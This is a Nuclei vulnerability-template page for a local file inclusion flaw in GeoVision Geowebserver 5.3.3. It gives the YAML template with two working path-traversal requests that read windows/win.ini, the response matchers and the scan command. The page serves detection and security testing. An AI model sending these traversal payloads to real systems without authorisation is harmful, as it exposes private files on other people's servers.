GeoVision Geowebserver 5.3.3 - Local File Inclusion
ID: geowebserver-lfi
Severity: high
Author: madrobot
Tags: packetstorm,geowebserver,lfi,xss
Description
Section titled “Description”GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
YAML Source
Section titled “YAML Source”id: geowebserver-lfi
info: name: GeoVision Geowebserver 5.3.3 - Local File Inclusion author: madrobot severity: high description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. reference: - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 2 tags: packetstorm,geowebserver,lfi,xss
http: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
matchers-condition: and matchers: - type: word words: - "bit app support" - "fonts" - "extensions" condition: and part: body
- type: status status: - 200# digest: 490a0046304402204263d528f4443d9af6586127adf56ef3f7525adb163550135c9460beaab2f5450220125cc4c542ffca32468485a61214f58519499ee53d8e024d17cd565b8c00cf62:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/geovision-geowebserver-lfi.yaml"